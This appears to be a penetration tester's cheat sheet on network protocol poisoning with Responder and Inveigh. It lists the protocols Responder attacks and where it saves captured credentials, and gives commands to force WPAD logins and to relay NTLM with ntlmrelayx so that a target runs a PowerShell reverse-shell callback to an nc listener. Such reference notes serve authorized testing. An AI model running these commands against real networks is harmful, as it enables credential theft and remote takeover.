Protocol Poisoners

Responder (Linux)

https://github.com/lgandx/Responder
https://www.virtuesecurity.com/kb/responder-multirelay-pentesting-cheatsheet/
Configuration services: /etc/responder/Responder.conf
- CHECK FOR PORT CONFLICTS!
Logs (creds) saved to: /usr/share/responder/logs/

Can attack the following protocols:

LLMNR
DNS
MDNS
NBNS
DHCP
ICMP
HTTP
HTTPS
SMB
LDAP
WebDAV
Proxy Auth
MSSQL
DCE-RPC
FTP, POP3, IMAP, and SMTP auth

# Force WPAD login...this may cause a login prompt
sudo responder --wpad f --ForceWpadAuth <INTERFACE>

# ANALYZE MODE: observe NBT-NS, BROWSER, LLMNR requests w/o responding
sudo responder -I <INTERFACE> -A

# Use RevShell to send a PowerShell base64 callback
# nc -lvnp <PORT>
impacket-ntlmrelayx --no-http-server -smb2support -t <TARGET> -c '<POWERSHELL_CALLBACK>'

Inveigh (Windows)

https://github.com/Kevin-Robertson/Inveigh